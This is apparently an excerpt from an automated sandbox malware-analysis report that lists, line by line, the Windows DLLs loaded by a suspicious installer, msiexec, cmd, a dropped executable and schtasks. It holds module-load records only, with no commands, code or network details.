                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: atlthunk.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: iconcodecservice.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: explorerframe.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: tsappcmp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cryptnet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: webio.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.xaml.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dcomp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windowmanagementapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: inputhost.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: uiamanager.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dxgi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mrmcorer.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: d3d11.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.immersive.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: d3d10warp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dataexchange.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dxcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: d2d1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: uiautomationcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.globalization.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: bcp47mrm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: directmanipulation.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: threadpoolwinrt.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: oleacc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: inputhost.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: mscoree.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: apphelp.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: kernel.appcore.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: version.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: windows.storage.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: wldp.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: profapi.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: cryptsp.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: rsaenh.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: cryptbase.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: sspicli.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: ktmw32.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: amsi.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: userenv.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: ntmarta.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: wbemcomn.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: uxtheme.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: propsys.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: dlnashext.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: wpdshext.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: edputil.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: urlmon.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: iertutil.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: srvcli.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: netutils.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: windows.staterepositoryps.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: wintypes.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: appresolver.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: bcp47langs.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: slc.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: sppc.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: onecorecommonproxystub.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
